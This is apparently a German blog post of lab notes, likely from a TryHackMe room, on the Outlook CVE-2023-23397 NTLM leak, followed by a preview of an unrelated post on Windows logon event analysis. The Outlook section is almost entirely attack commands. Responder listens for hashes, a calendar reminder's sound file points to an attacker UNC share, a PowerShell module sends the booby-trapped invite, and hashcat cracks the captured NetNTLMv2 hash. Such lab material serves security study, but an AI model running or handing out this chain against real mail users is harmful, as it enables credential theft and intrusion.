Outlook NTLM Leak

sudo responder -I ens5


OutlookSpy

AppointmentItem.ReminderOverrideDefault = true
AppointmentItem.ReminderPlaySound = true
AppointmentItem.ReminderSoundFile = \\10.10.44.201\tmp\sound.wav


Import-Module .\CVE-2023-23397.ps1

Send-CalendarNTLMLeak -recipient "test@thm.loc" -remotefilepath "\\10.10.44.201\foo\bar.wav" -meetingsubject "Emmi Meeting" -meetingbody "Hallo Jörg. Anbei die versprochene Einladung :)"


hashcat -m 5600 hash.txt password.txt

Beliebte Posts aus diesem Blog

Shutdown / Lastlogon Analyse

Wer hat das System heruntergefahren: Get-EventLog - LogName system - Source user32 - Newest 1 | fl * Logons der letzten 7 Tage: $filter = @ {     LogName       = 'System'     ProviderName = 'Microsoft-Windows-Winlogon'     StartTime     = ( Get-Date ). AddDays ( -7 ) } $logs = Get-WinEvent - FilterHashtable $filter $res = @ () ForEach ( $log in $logs ) {     if ( $log . Id -eq 7001 ) { $type = "Logon" }     elseif ( $log . Id -eq 7002 ) { $type = "Logoff" }     else { Continue }     # Check if Properties[1] exists before accessing     if ( $log . Properties . Count -gt 1 ) {         try {             $user = ( New-Object System.Security.Principal.SecurityIdentifier $log . Properties [ 1 ]. Value ). Translate ([ System.Security.Principal.NTAccount ])         } catch { ...
Mehr anzeigen